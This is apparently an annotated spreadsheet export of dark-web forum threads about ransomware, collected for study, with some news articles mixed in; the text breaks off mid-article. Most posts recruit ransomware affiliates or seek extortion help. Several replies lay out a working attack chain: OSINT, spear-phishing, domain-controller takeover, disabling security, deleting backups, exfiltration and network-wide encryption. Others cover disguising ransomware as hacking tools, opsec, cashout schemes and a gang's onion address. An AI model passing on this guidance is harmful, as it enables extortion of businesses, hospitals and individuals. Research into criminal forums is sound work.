    <t>hi there, i'm dadylovesweed07.. founder/creator of the no mercy ransomware group, and we are looking for experienced pentesters..;;so before talking further let me introduce myself and the group.. starting with me i'm dadylovesweed07 founder/creator of the no mercy ransomware group. i have a experience of 5 to 5 and a half years in offensive security..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infrastructures.if the company/organizations which we have compromised/targeted satisfies our needs which is paying the ransom.. we will hand over the decryption tool. there's nothing personal it's strictly business..;;;we are looking for pentesters.;;so what can i offer?;-money is the only thing which i can offer.;;so how should i contact you?;- just pm me and i'll try to respond asap.;;;thank you for your time, stay safe and have a great day!</t>
  </si>
  <si>
    <t>18/01/2022 05:13</t>
  </si>
  <si>
    <t>/d/devops</t>
  </si>
  <si>
    <t>3cd245ee578dfcacfb35</t>
  </si>
  <si>
    <t>Need Pentesters for Ransomware Group.</t>
  </si>
  <si>
    <t>26 days 06:16:00</t>
  </si>
  <si>
    <t>;;need pentesters for ransomware group.;;by;/u/dadylovesweed07;���;9 months ago;in;/d/devops;;0 points;���;</t>
  </si>
  <si>
    <t>19/01/2022 11:03</t>
  </si>
  <si>
    <t>e43dfcc6bbc4d7737cf1</t>
  </si>
  <si>
    <t>0 days 06:44:00</t>
  </si>
  <si>
    <t>19/01/2022 11:04</t>
  </si>
  <si>
    <t>/d/freelance</t>
  </si>
  <si>
    <t>1b6fc8266b5fe662c9e9</t>
  </si>
  <si>
    <t>28 days 00:47:00</t>
  </si>
  <si>
    <t>e3dd468dfdcb9b6e6947</t>
  </si>
  <si>
    <t>telegram isn't safe at all. i can give you my jabber.</t>
  </si>
  <si>
    <t>19/01/2022 17:47</t>
  </si>
  <si>
    <t>26/01/2022 18:32</t>
  </si>
  <si>
    <t>b228db974d39a15710f7</t>
  </si>
  <si>
    <t>15 days 12:52:00</t>
  </si>
  <si>
    <t>i think you will get better responses if you can give out some more information - there are a lot of ransomware 'affiliate' programs which are just trying to get others to do the hard work and then taking a cut.;;what ransomware do you have? is it your own custom built or some ranion/etc. copy? do you have a full c&amp;c system and auto-wallets set up?;;i'm asking here instead of pm as i think everyone will find it useful.</t>
  </si>
  <si>
    <t>8f0b07c77eb3b6681f8d</t>
  </si>
  <si>
    <t>Need Pentesters for ransomware group</t>
  </si>
  <si>
    <t>1 days 09:55:00</t>
  </si>
  <si>
    <t>2 days 10:54:00</t>
  </si>
  <si>
    <t>the ransomware is custom, created by our own ransomware and malware dev team.;- yes we do have auto wallets;- yes we have c2 or c &amp; c infrastructure(some of it is still under work);;quote[i'm asking here instead of pm as i think everyone will find it useful.]quote;- i appreciate it :)</t>
  </si>
  <si>
    <t>13/01/2022 17:20</t>
  </si>
  <si>
    <t>1 days 00:59:00</t>
  </si>
  <si>
    <t>i have lots of targets to spread ransomware. are there any onion urls which provide raas with fud ransomware?</t>
  </si>
  <si>
    <t>User aksing for links to urls that provide raas</t>
  </si>
  <si>
    <t>25/02/2020 22:19</t>
  </si>
  <si>
    <t>d1a279eb649f7cdf8176</t>
  </si>
  <si>
    <t>Need Ransomware service provider</t>
  </si>
  <si>
    <t>0 days 22:43:00</t>
  </si>
  <si>
    <t>my ransomware is already fud, i thought you are the one that said you wanted to spread for share on jabber two days ago.</t>
  </si>
  <si>
    <t>User asking for links to urls that provide raas</t>
  </si>
  <si>
    <t>26/02/2020 21:02</t>
  </si>
  <si>
    <t>if i pay somebody to hack em' i'll of coarse pay but then i want the to use my btc address for the ransomware</t>
  </si>
  <si>
    <t>User asking for a website to be hacked</t>
  </si>
  <si>
    <t>/u/Reedmove1738</t>
  </si>
  <si>
    <t>29/02/2020 22:44</t>
  </si>
  <si>
    <t>f3e45c95e417104e57d8</t>
  </si>
  <si>
    <t>Need a website Hacked!!!! ASAP</t>
  </si>
  <si>
    <t>24 days 06:52:00</t>
  </si>
  <si>
    <t>i've tried smtp, social media and torrent spreading and none seem to work i don't understand and just need some guidance or a lead on spreading just something.;;edit: i have used multiple crypts and binders and tested these modified versions on virtual boxes</t>
  </si>
  <si>
    <t>User asking for guidance on how to spread ransomware</t>
  </si>
  <si>
    <t>/u/vvs3245</t>
  </si>
  <si>
    <t>24/03/2022 14:40</t>
  </si>
  <si>
    <t>4625fe5acb2f8ba36b74</t>
  </si>
  <si>
    <t>Need advice/help spreading randomware</t>
  </si>
  <si>
    <t>0 days 20:43:00</t>
  </si>
  <si>
    <t>target enterprises ! you must use osint to retrieve informations about companies (infrastructures, mails, users, it service etc.) to attack them better hide your malicious file into mails that you send to easy targets (old users, new or unexperimented employees).;;if you want small fishes you can still target unexperimented haxors by hiding your ransomware into fake hacking software, it works pretty fine lmao. do a youtube video about "how to use my hacking software" and post your ransomware in description, and precise that users must disable their antivirus before executing your ransomware;;be aware to have the most fud malware before the spreading process, if you don't get any result you might be fucked because of the low hiding capacity of your malware. test your malware on virtual machines before !</t>
  </si>
  <si>
    <t>/u/webious_</t>
  </si>
  <si>
    <t>24/03/2022 15:07</t>
  </si>
  <si>
    <t>there is much more to conducting ransomware attacks than just spray and pray. first of all you need to obfuscate your stager(s) and payload enough for it not to be caught by endpoint security solutions. after you have usable malware it's all about finding the right organization and their weakest link.;;a lot of osint later, you should find a weakest link (e.g. older employees, tech-illiterate) and go for spear-phishing with heavily personalized e-mail regarding something you are certain (to a degree) they will open. let's say you managed to gain access to the organization internal systems (e.g. shell, rdp, stolen credentials), next step is recconisance and privilege escalation. once you get to their dc (domain controler) you need to disable any security they have in place, locate backups which you will delete, upload data to a server under your control and last but not least push out your ransomware to all devices on the network starting the encryption process.;;while all of this might seem trivial, it's really not. becuase you need to find data thats worth stealing in the first place. my suggestion is go to ramp forum and seek out iabs who can provide you with compromised system administrator account credentials.</t>
  </si>
  <si>
    <t>24/03/2022 17:13</t>
  </si>
  <si>
    <t>97bb9995c1de1784525c</t>
  </si>
  <si>
    <t>Need advice/help spreading ransomware</t>
  </si>
  <si>
    <t>14 days 08:41:00</t>
  </si>
  <si>
    <t>do you already have working fud ransomware or are you looking for someone to build it all for you?;;there are a lot of posts about people wanting affiliates but it normally turns out they need someone to do all the work, or they have old/useless ransomware they've just re-branded.;;to get good responses you'll have to write more about the tech specs of your ransomware and what you are offering other than just tech support + maybe some paid leave if things go well.</t>
  </si>
  <si>
    <t>23/03/2022 15:17</t>
  </si>
  <si>
    <t>0b727b93a04649aaa96a</t>
  </si>
  <si>
    <t>Need affiliates | VulcanRasnomTeam</t>
  </si>
  <si>
    <t>0 days 21:37:00</t>
  </si>
  <si>
    <t>18 days 11:08:00</t>
  </si>
  <si>
    <t>apologizes for late response. we want to start from scratch so we need someone to build ransomware.</t>
  </si>
  <si>
    <t>25/03/2022 17:42</t>
  </si>
  <si>
    <t>you can build the product, we want you product.. you get payed to build it. we too earn profits. both of us will have consistent and higher financial gains together.</t>
  </si>
  <si>
    <t>30/03/2022 06:43</t>
  </si>
  <si>
    <t>0 days 17:47:00</t>
  </si>
  <si>
    <t>ok, how much are you paying for someone to build it?</t>
  </si>
  <si>
    <t>8 days 04:45:00</t>
  </si>
  <si>
    <t>it depends on how skilled and experienced an individual is. or if he's working with team that's experienced and skilled it would be good too.</t>
  </si>
  <si>
    <t>2 days 17:20:00</t>
  </si>
  <si>
    <t>hey there....so as the title says the most i need members for our hacking group and i'm looking for at least 10 members who have good skills and knowledge about hacking,malware's,ransomeware's,networking,pentesting,a bit of programming,and good at social engineering.."programming isn't mandatory".;;;so the intention of creating this hacking group is to target some medium size business's at first so that we can get an idea of how things work..plus it's less risky at first and could earn a pretty decent amount though.(in my opinion). and later on moving to big business's /company's.;;the amount will be divided equally among members :);;if you are interested then do let me know in pm or in the comments..;-----------------------------------------------------------------------------------------------------------------;;**answers of some of the question that people ask me:-**;-----------------------------------------------------------------------------------------------------------------;1.what can you offer?;ans:- anything..(only things that i can afford);-----------------------------------------------------------------------------------------------------------------;2.are you legit? and is this some kind of honeypot by le?;ans:- yes i'm legit..and no! this isn't any kind of honey pot..;-----------------------------------------------------------------------------------------------------------------;3.how can i communicate with you?;ans:- just pm me and i'll try to respond as soon as possible..;-----------------------------------------------------------------------------------------------------------------;4.do you have any skills? and past experience?;ans:- i have 5 to 5 and a half years of experience in red team operations/security,pentesting,social engineering,etc..;-----------------------------------------------------------------------------------------------------------------;5.if you have 5 to 5 and a half years of experience then why don't you just target some big businesse's?;ans:- the answer is not taking risk at the very beginning..and improving ourselves,learning form our mistakes..;;-----------------------------------------------------------------------------------------------------------------;***note****:- please don't message and waste my time if you are trying to sell your products or something like that..it's a request.;;-----------------------------------------------------------------------------------------------------------------;thank you for your time gentlemens..any recommendations will be taken into consideration and will try to improve.;-----------------------------------------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>User asking for alliliates to work with</t>
  </si>
  <si>
    <t>c88c609349cd6f2df413</t>
  </si>
  <si>
    <t>Need members For Hacking Group..</t>
  </si>
  <si>
    <t>78 days 13:39:00</t>
  </si>
  <si>
    <t>i'm going to be honest no one serious will work with you and you won't find it here, if you really want the possibility to build a group as such you should try to levitate your own skill set to the point where you bring addition in such a group, so many people these days read articles about ransomware groups and such but most groups don't even work out, that is if the people in the group aren't equally motivated or have the same skill set. any self respecting programmer won't just do all the work and then divide his income among other people, it just wouldn't be fair on his side.;;you should learn a language and search for people on different forums for jobs like these, and you shouldn't just ask to "build a group" usually it happens rather naturally, you come across people sell them products bring your addition to a group etc... and that's how groups are actually formed, with people you usually already know and / or have worked with. a group with a bunch of random people won't be stable at all.</t>
  </si>
  <si>
    <t>User asking for alliliates to work with - Responder being honest about no-one serious will work with them without work on their side</t>
  </si>
  <si>
    <t>15/09/2021 20:43</t>
  </si>
  <si>
    <t>0 days 10:33:00</t>
  </si>
  <si>
    <t>thank you for the advice.</t>
  </si>
  <si>
    <t>16/09/2021 08:50</t>
  </si>
  <si>
    <t>0 days 12:07:00</t>
  </si>
  <si>
    <t>the operators of the nemty ransomware have announced this week they were shutting down their public ransomware-as-a-service operation and opting to go private in order to focus and put more rersources on targeted attacks.;;for those unfamiliar with this malware operation, nemty is a classic raas (ransomware-as-a-service). it launched in the summer of 2019 and has been heavily advertised on underground russian-speaking hacking forums.;;users who signed up with the nemty raas were granted access to a web portal where they could create custom versions of the nemty ransomware.;;the customers were then free to distribute these custom versions via their own methods. over the past few months, the nemty ransomware has been spotted being distributed via email spam (malspam) campaigns, exploit kits, boobytrapped apps, and by brute-forcing rdp endpoints.;;distribution methods varied based on the nemty raas customer who was spreading that particular nemty strain.;;if any of the victims who had computers infected with nemty paid the ransom demand, the nemty operator kept 30% of the payment, while the distributors got %70 for their efforts.;nemty goes private after 10 months;;but in an update posted on a dedicated topic on the exploit hacking forum, the nemty operator announced yesterday they were shutting down their raas operation and going private. going private in the cybercriminal underground means working with a few selected partners to distribute your malware.;;the nemty operator gave victims a week to pay any ransom demands they have before they would shut down all servers, and users would be unable to decrypt their files, even if they wanted to pay.;;;https://linx.li/11111111111111111115.png;;a day after the announcement, the nemty crew also shut down its leak site, a portal where the nemty gang publish files from companies that refused to pay ransom demands.;;;https://linx.li/11111111111111111116.png;;in october 2019, tesorion security researchers released free decrypters, for three versions of the nemty ransomware. however, recent versions are not decryptable.;;the author of the nemty ransomware also appears to have shared nemtys source code with others, as last month a new ransomware strain named nefilim was spotted online. sentinellabs vitali kremez and id ransomwares michael gillespie said the new nefilim ransomware appears to be based on nemtys code.;;the nefilim ransomware has been deployed only in a small number of attacks against large companies. it is this modus operandi that the nemty gang is now hoping to transition to.</t>
  </si>
  <si>
    <t>Nempty ransomware group announced their were closing down</t>
  </si>
  <si>
    <t>17/04/2020 10:11</t>
  </si>
  <si>
    <t>b1086bd04eadaadcce6f</t>
  </si>
  <si>
    <t>Nemty ransomware operation shuts down public RaaS</t>
  </si>
  <si>
    <t>{'ransomware': 6, 'raas': 4}</t>
  </si>
  <si>
    <t>;;nemty ransomware operation shuts down public raas;;by;/u/chronos;���;2 years ago;in;/d/chronos;;2 points;���;</t>
  </si>
  <si>
    <t>17/04/2020 10:19</t>
  </si>
  <si>
    <t>d500592630af93a845a3</t>
  </si>
  <si>
    <t>raidforums for all your leaks;sans;ransomware.</t>
  </si>
  <si>
    <t>20/05/2021 14:45</t>
  </si>
  <si>
    <t>b327b74b85603a4cd58b</t>
  </si>
  <si>
    <t>News and information leaks? Comunities? Anything about data?</t>
  </si>
  <si>
    <t>0 days 02:43:00</t>
  </si>
  <si>
    <t>2 days 02:40:00</t>
  </si>
  <si>
    <t>hey guys hope u r doing well.;today i got a remote connection of indian local bank system they were using old versions so i easily exploited their server with my s.e skills and hid methods.;well what i need to do now? i need to threaten them? or ransomware?;which is the best move i can play next.;please explain me in details.;waiting for your all replies.</t>
  </si>
  <si>
    <t>User asking for next steps after retreving stolen data from bank system</t>
  </si>
  <si>
    <t>/u/funshadow</t>
  </si>
  <si>
    <t>17/02/2022 13:16</t>
  </si>
  <si>
    <t>c5437741c8f329af6770</t>
  </si>
  <si>
    <t>Next what to do!</t>
  </si>
  <si>
    <t>7 days 03:43:00</t>
  </si>
  <si>
    <t>what's the *best* thing you can do?  report the vulnerability to them and hope for a bug bounty or something.;;as far as the *most profitable* thing you can do... i'm sure someone else can help answer that &gt;_&gt;</t>
  </si>
  <si>
    <t>17/02/2022 17:31</t>
  </si>
  <si>
    <t>0 days 04:15:00</t>
  </si>
  <si>
    <t>i cant do that, firstly i compromised without their permission which is illegal better i will threat them for money or else i will sell their entire root directory content.;;but i dont know where i need to sell them. have any isreal contacts?</t>
  </si>
  <si>
    <t>17/02/2022 18:47</t>
  </si>
  <si>
    <t>0 days 01:16:00</t>
  </si>
  <si>
    <t>you won't tell them because it is illegal, but are still ready to do something much more illegal? i don't fully get it. anyway.;;i really don't want to seem mean, but i think that, if you don't know what should be your next move, you don't know enough to go further. you'll eventually get caught.;;my advice: get a lawyer and tell them about the situation. they won't be allowed to talk to anyone about it, and (depending on your country/the lawyer) will be able to negotiate an agreement with the bank on your behalf (some money vs. you explain the vulnerability to them + they don't sue you).</t>
  </si>
  <si>
    <t>/u/Surquem</t>
  </si>
  <si>
    <t>19/02/2022 12:38</t>
  </si>
  <si>
    <t>1 days 17:41:00</t>
  </si>
  <si>
    <t>sir you are right.;but every hacker dont have same methods to compromise servers.;depending on their social engineering skills one can be different.;;i usually worked with cops a long before, currently i left this job as there is no scope being a white hat i know their tactics very well. i covered all traces. but i dont know what i need to do now! please sir if you know anyone let me know. i planned this a long ago</t>
  </si>
  <si>
    <t>24/02/2022 16:59</t>
  </si>
  <si>
    <t>5 days 04:21:00</t>
  </si>
  <si>
    <t>how to make money in the darknet :;;1)you can make good money cashout hacked paypal;;2) bank logs cashout;;3) coinbase or any exchanger account cashout;;4) spamming tools (send millions email to people +infect them with trojan and steal their credentials : bank logs ,paypal,cc ) or register to genesis fingerprint market and buy bots for paypal, bank logs ...........;;5) ransomware spreading (buy business email list , use a binder to hide your trojan and send thousands email );;6) cashout cc numbers = online carding;;7) clone credit cards : dumps and skimmer = cashout at pos or atms;;8) cashing out digital checks;;.............. many ways</t>
  </si>
  <si>
    <t>User asking how to make money quickly, refrences ransomware</t>
  </si>
  <si>
    <t>54a7580d20891cf2e33d</t>
  </si>
  <si>
    <t>Noob here: How do I make some quick cash at darkweb, lol?</t>
  </si>
  <si>
    <t>2 days 02:24:00</t>
  </si>
  <si>
    <t>i was reading a story on darknetonline.com that revil is back.;;apparently they have a blog called happy blog where they sell their stolen data. does anyone has any experience with this hacking shop. does anyone know if its available to normal users to buy stuff and if so, is it 'hot' ?</t>
  </si>
  <si>
    <t>User mentioning that revil may be back</t>
  </si>
  <si>
    <t>/u/Whiplash293</t>
  </si>
  <si>
    <t>6bed309666101fc55259</t>
  </si>
  <si>
    <t>Notorious Russian Ransomware Group REvil is back?</t>
  </si>
  <si>
    <t>30 days 05:54:00</t>
  </si>
  <si>
    <t>yes, they're back, and you can find them here:;http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion</t>
  </si>
  <si>
    <t>0 days 00:54:00</t>
  </si>
  <si>
    <t>if i got into ransomware *good chunk of cash*;what opsec precautions would i have to follow (i.e, os, alias, vpn *etc*)</t>
  </si>
  <si>
    <t>User asking what opsec precautions they should follow when getting into ransomware</t>
  </si>
  <si>
    <t>bec5761fb8a039f9c3a2</t>
  </si>
  <si>
    <t>OPSEC for a high profile person</t>
  </si>
  <si>
    <t>0 days 14:56:00</t>
  </si>
  <si>
    <t>"always keep your mouth shut and never rat on your friends."</t>
  </si>
  <si>
    <t>this is actually a great precaution, because in the world of the darkweb, lots of people snitch, either forcefully or under pressure that they will go to jail for long times</t>
  </si>
  <si>
    <t>noone knows what i would name the group, or the ransomware itself, and i doubt it wont take long</t>
  </si>
  <si>
    <t>0 days 01:06:00</t>
  </si>
  <si>
    <t>the financial times stock exchange (ftse) 100 index is made up of the 100 biggest companies by market capitalisation on the london stock exchange. these companies represent some of the most influential and profitable enterprises on the market across various industry verticals.;;it was found that the majority (81%) of the companies within the ftse 100 had at least one credential compromised and exposed on the dark web.;;using its threat monitoring and auditing tool blueliv, it found up to 31,135 exposed user credentials belonging to ftse 100 companies on the open, deep and dark web. in fact, 75% of these credentials were stolen through data breaches and 25% were unknowingly obtained via a malware infection.;;of this number, over 60% of the stolen user logins and passwords came from three of the highest regulated industries ��� it/telecom (23%), energy and utility (22%) and finance (21%) among the world���s biggest companies.;;ransomware groups from conti to revil are known to use stolen credentialstial access.</t>
  </si>
  <si>
    <t xml:space="preserve">Post detailing leak of FTSE credentials </t>
  </si>
  <si>
    <t>15/05/2022 15:53</t>
  </si>
  <si>
    <t>bdf64147f1ef013d9067</t>
  </si>
  <si>
    <t>Over 31,000 leaked credentials from FTSE 100 end up on Dark Web</t>
  </si>
  <si>
    <t>ok does anyone know where i can find a bunch random emails to send phishing emails to for ransomeware like im talking thousands so i can send them out say in 2 weeks or suntin i send to  10000 only 3000 hit charge 50 dollars thts a big take i know bit unrealistic but u get the point. thank you for any help;im a noob who basically knows nothing bout phishing so if someone can explain every thing in order for me to accomplish what i want which is making a big buck;thanks much appreciated</t>
  </si>
  <si>
    <t>User asking how to find a large amount of random emails to send phising and ransomware to</t>
  </si>
  <si>
    <t>/u/victortherealone</t>
  </si>
  <si>
    <t>15/03/2021 18:10</t>
  </si>
  <si>
    <t>a02ca02f72029480dbce</t>
  </si>
  <si>
    <t>PHISHING</t>
  </si>
  <si>
    <t>2 days 14:39:00</t>
  </si>
  <si>
    <t>if your a noob, you should be spending all your time learning before mass spamming thousands of ransomwares. or go ahead and dont be surprised when the police knock on your door the next day</t>
  </si>
  <si>
    <t>/u/Bucephalus</t>
  </si>
  <si>
    <t>16/03/2021 17:37</t>
  </si>
  <si>
    <t>0 days 23:27:00</t>
  </si>
  <si>
    <t>thats true, first you need to learn opsec and then yo will make a true ransomware or phishing sites</t>
  </si>
  <si>
    <t>/u/TAKO2814</t>
  </si>
  <si>
    <t>18/03/2021 08:49</t>
  </si>
  <si>
    <t>i need a skilled partner who knows what he is doing with ransomware + rat.;lets say i can get us enough leads of pharmacies, hospitals, health insitutions &amp; doctors and so on..;imagine what this damage could do in terms of getting $;;hit me up if you got those tools, and know what you are doing</t>
  </si>
  <si>
    <t>User asking for allilate to work with them in creating ransomware</t>
  </si>
  <si>
    <t>/u/ryders</t>
  </si>
  <si>
    <t>24/11/2018 21:05</t>
  </si>
  <si>
    <t>d54028b987f045352bf8</t>
  </si>
  <si>
    <t>Partner needed with Ransomware + RAT</t>
  </si>
  <si>
    <t>0 days 13:32:00</t>
  </si>
  <si>
    <t>does anybody have knowledge on how to make a kind of ransom with a payload mostly with a type 'rubber ducky' 'usb'?</t>
  </si>
  <si>
    <t>User asking for information on how to make specific ransomware</t>
  </si>
  <si>
    <t>26/10/2021 04:08</t>
  </si>
  <si>
    <t>c74c997800dba271e4fd</t>
  </si>
  <si>
    <t>Payload Ransomware</t>
  </si>
  <si>
    <t>0 days 05:34:00</t>
  </si>
  <si>
    <t>while this is very straightforward to do, it's very bad idea if you want to use it as ongoing campaign to generate revenue. common misconception with ransomware is that you only need to encrpyt data and you're done, but that can't be further from the reality of the situation. you need to know exactly what data to encrypt, steal, and at the right time.;;you would have to provide more information on what exactly you want to do, what do you have access to, and so on.</t>
  </si>
  <si>
    <t>26/10/2021 06:01</t>
  </si>
  <si>
    <t>0 days 01:53:00</t>
  </si>
  <si>
    <t>if your attacking enterprises then they are already linux based.;you can write a simple python script to encrypt the data using a pgp key then you can leave your contact to obtain key</t>
  </si>
  <si>
    <t>26/10/2021 08:05</t>
  </si>
  <si>
    <t>0 days 02:04:00</t>
  </si>
  <si>
    <t>this is true in cases of bigger enterprise targets.;however, in order to do this, you need to maintain access to their systems in a long period of time, which is risky if they have proper system admins.;extortion of data requires a lot of time to transfer it (over tor preferably) and also requires proper servers to store and maintain.;;for small targets i'd recommend stealing credentials and encrypting everything after, since he's going for usb, so he doesn't get noticed.</t>
  </si>
  <si>
    <t>26/10/2021 09:17</t>
  </si>
  <si>
    <t>my point exactly. i see bad usb more useful in building a small botnet, creating reverse shell connections to your c2.</t>
  </si>
  <si>
    <t>26/10/2021 09:42</t>
  </si>
  <si>
    <t>basically looking to have some questions answered, i've never been able to find proper content on dread, so maybe making this post will help future users. also looking for resources on ransomware, (guides, videos, articles), a look into a proper opsec model, and any environments i can set up in order to simulate attacks on enterprise/personal organizations.;;----------------------------------------------------------------------------------------------------------------------------------------;;1. i already have a broad knowledge of what a ransomware attack may look like i.e get a host computer to download a malicious file and encrypt certain files automatically or manually. i've heard that some ransomware have a gui in order to choose which files get encrypted. is my general perception of a ransomware attack even accurate? is there any videos out there in order to paint a proper picture of what an attack/defense of an attack like this might look? how would it differ in an enterprise environment, ie a server?;;2. now for my questions regarding the opsec model, the underbelly of the internet i come from has a lower threshold of threat due to a more widespread occurrence of the action being committed, with ransomware i would assume a certain three letter agency would put it higher on their list of priorities, requiring a higher threat model. you probably can't launch an attack like this at a fucking mcdonalds, so a home network would probably be required. and since pretty much everyone here agrees windows is spyware, and everyone having different preferences would qubes be overkill for a job like this? or would a linux distro like tails or kali as a host os be just enough to make it a pain in the dick for the feds to catch you (if they want to, they will) and would the standard techniques of mac spoofing, vpn's (router vpn as well) proxies help maintain anonymity?;;3. lastly, i am in clear understanding that in order to not be a "script kiddy" i'll need to learn proper pentesting skills. currently, i am learning powershell as my first language. i'm assuming ill have to learn python and javascript, so that's on the list. my next question is if there any website or a homelab set up i can create or use in order to simulate real world ransom scenarios, such as hackthebox, hackthissite, etc etc.;;i appreciate any and all experienced ransomers you guys spreading the knowledge and hope this thread can not only help me, but many in this up and coming community. thanks.</t>
  </si>
  <si>
    <t>User asking for pointers towards ransomware</t>
  </si>
  <si>
    <t>/u/cocklover223</t>
  </si>
  <si>
    <t>15/05/2022 20:19</t>
  </si>
  <si>
    <t>d462c7d35e607d052007</t>
  </si>
  <si>
    <t>Pointers Towards Ransomware</t>
  </si>
  <si>
    <t>0 days 22:17:00</t>
  </si>
  <si>
    <t>basically for 1) the ransomware will usually encrypt all files that are worth it automatically (skipping exe and dll files because they are heavy for encryption and usually have no worth). difference is that in a corporate environment you need to propagate the ransomware to multiple machines which might be more difficult than in regular networks - there are security devices in corporate networks that analyze network traffic and can detect security incidents.;;2) don't use windows if you don't have to. route all traffic through tor (+vpn if needed) via whonix. proxies are basically the same as vpn but less secure (depends on type of proxy). mac spoofing is very easily done in any distro/windows.;;3) you should look up exploits and exploit scanners as a priority. you don't need javascript - you're not gonna make websites, this is only good if you're making phishing websites or drive-by download pages. python is very easy to learn and is good for automation and exploiting. you can also focus on bruteforcing vn/rdp/vpn and other similar protocols.;;if you're looking for a beginner friendly ransomware with a video tutorial check out my subdread;/d/redeemer;, you might find it useful. i'm the only coder and if you verify the hashes of all files before you run them - i can guarantee personally for them. a fair bit of people got very high sums of money thanks to it, which makes me extremely satisfied.;;when it comes to ransomware, it's critical to know the details behind cryptography - if you're not 100% sure in encryption algorithms - you shouldn't be coding a ransomware. this is why a lot of groups had their ransomware getting decrypted - they used very bad custom algorithms or insecure modes of standard algorithms, which allowed companies to make free decryption software, which totally kills the profits, since victims usually search if the ransomware is decryptable first thing when they see the results of an attack.</t>
  </si>
  <si>
    <t>16/05/2022 18:36</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the fbi, europol and other law enforcement agencies shut down a virtual private network tuesday that was providing a "bulletproof hosting service" that allowed cybercriminals to conduct a variety of illegal operations, including ransomware attacks, while remaining hidden from police.;;no arrests were made in association with the takedown.;;the joint effort, dubbed "operation nova," took down three domains associated with the vpn named safe-inet - insorg.org, safe-inet.com and safe-inet.net - all of which were used as part of the bulletproof hosting service, the u.s. justice department reports.;;"these services are designed to facilitate uninterrupted online criminal activities and to allow customers to operate while evading detections by law enforcement," the justice department states. "many of these services are advertised on online forums dedicated to discussing criminal activity.";;europol, the european law enforcement agency, says this high-priced vpn service was advertised on darknet forums. for more than a decade, cybercriminals used it to facilitate online crimes, including ransomware attacks and e-commerce skimming. the service offered up to five layers of anonymous vpn connections to help avoid law enforcement interception.;;"law enforcement was able to identify some 250 companies worldwide which were being spied on by the criminals using this vpn," euopol states. "these companies were subsequently warned of an imminent ransomware attack against their systems, allowing them to take measures to protect themselves against such an attack.";;;operation nova;;the takedown was led by the german reutlingen police headquarters, working in conjunction with the fbi, europol, french, swiss and dutch law enforcement agencies. in addition to the domains being taken offline, the police agencies took down servers located in five countries on monday, the justice department says.;;the vpn moved its customer accounts and data from one ip address, server or country to another to help evade detection, authorities say. also, it did not maintain logs.;;"much of the criminal activity occurring on the network involved cyber actors responsible for ransomware, e-skimming breaches, spear phishing and account takeovers," the justice department says. "the service's website offered support in russian and english languages at a high price to the criminal underworld. this infrastructure preferred by cybercriminals was used to compromise networks all around the world.";;;international cooperation;;operation nova is the latest in a series of international legal actions designed to crack down on online operations that help facilitate cybercrime.;;in november, europol, working with other european agencies, arrested two romanians for allegedly selling services - including malware encryption - that helped cybercriminals circumvent antivirus tools (see: 2 arrested for operating malware encryption service).;;an international law enforcement operation in october involving 16 countries resulted in the arrest of 20 individuals suspected of belonging to the qqaazz criminal network, which helped launder cash and cryptocurrency for other cybercriminals.</t>
  </si>
  <si>
    <t>Article stating law enforcement has dismantled strong hosting website used for many things including ransomware</t>
  </si>
  <si>
    <t>248ac1b22fa6a2ac0e83</t>
  </si>
  <si>
    <t>Police Dismantle Cybercrime 'Bulletproof Hosting Service'</t>
  </si>
  <si>
    <t>is there any way to decrypt phobos ransomware, or there's still nothing avail?</t>
  </si>
  <si>
    <t>User asking if there is a way to de-crypt ransomware</t>
  </si>
  <si>
    <t>/u/hasira</t>
  </si>
  <si>
    <t>16/09/2020 13:58</t>
  </si>
  <si>
    <t>d315480029a8498051c9</t>
  </si>
  <si>
    <t>Possible to decrypt Phobos?</t>
  </si>
  <si>
    <t>3 days 16:04:00</t>
  </si>
  <si>
    <t>nothing like a 1 tool for all phobos has been or will be ever developed, people get confused where as a name long ago meant that  usually the same keys encrypted the data, now that it's easily purchased and users can add their own keys this makes for instance the name phobo is simply the name now any key could have been used to encrypt the data 1000000 different keys! more or less .. so best bets finding those that have paid for the key and see if they'll let you try their key on yours see if it just so happens to match, nearly impossible but never know..</t>
  </si>
  <si>
    <t>/u/dr0ik</t>
  </si>
  <si>
    <t>20/09/2020 06:02</t>
  </si>
  <si>
    <t>create;;btc , eth software;ransomware;create anonymous websites with payment processors;;................. use your imagination;;sell it in the markets</t>
  </si>
  <si>
    <t>User asking for advice</t>
  </si>
  <si>
    <t>/u/buyer4life</t>
  </si>
  <si>
    <t>17/08/2021 08:16</t>
  </si>
  <si>
    <t>a37f419553c5e123f8c2</t>
  </si>
  <si>
    <t>Programmer needs advice</t>
  </si>
  <si>
    <t>0 days 06:39:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the main reason someone would access the dark web would be to make use of the extreme privacy and anonymity it provides. how this anonymity is used is a different matter.;;;source:;irish examiner;;the government and the hse have confirmed that, as a result of the ransomware cyberattack on the health service last week, sensitive patient data stolen by cybercriminals will likely appear on the dark web from today on.;;but what exactly is the dark web, and why do cybercriminals use it?;;we answer some of your questions below:;;;what is the dark web?;;the dark web is not the internet you or i use every day. almost every website you can think of exists on the 'open', or 'surface' level of the internet. to get on sites like google, amazon, and facebook, all we really need is an ip (internet protocol) address - essentially the internet identity code of our computer or smart device. this code allows us to establish a connection with the sites and services we use every day.;;below the surface web lies the 'deep web' - the section of the internet that houses sites and databases containing information not openly indexed by search engines - think online purchases, bank transactions, medical records etc.  these sites are generally protected and can only usually be accessed by certain authorised persons.;;within the deep web exists the 'dark web', so-called because of the shadowy and often illicit nature of many of the sites found on it. the majority of the dark web sites are not readily accessible to the average internet user because they are hidden behind multiple layers of encryption, meaning that those who operate the sites, and those who use them, cannot be identified.;;;how does one access the dark web?;;to access the dark web, a person needs to make use of a specialised encryption tool, the most notable of which is called tor (the onion routing project). tor acts as a sort of browser that reroutes a person���s ip address through many other devices around the world, encrypting and ting it as it goes.;;in this way, the identity of someone visiting the dark web is hidden. those who run dark web sites conceal their identities in the same way.;;;why would someone visit the dark web at all?;;the main reason someone would access the dark web would be to make use of the extreme privacy and anonymity it provides. how this anonymity is used is a different matter.;;;the good;;it should be noted that not all uses of the dark web are nefarious. a journalist operating in an authoritarian state might wish to use the dark web to gather and share information. whistleblowers too have been known to use the dark web to disclose information without fear of reprisal. people who have been cyberstalked may also choose to use the dark web to fully maintain their online privacy.;;;the bad;;however, a majority of the activity on the dark web relates to illegal activity, and this is what has created headlines over the last decade or so. the anonymity the dark web ensures means hackers, extremists and criminals of all descriptions can use it to operate in the online world.;;indeed, a 2016 study by king's college in london found dark web black market sites advertising, among other things, the sale of firearms and weapons, drugs, and even hitmen for hire. the study also found dozens of sites and forums espousing 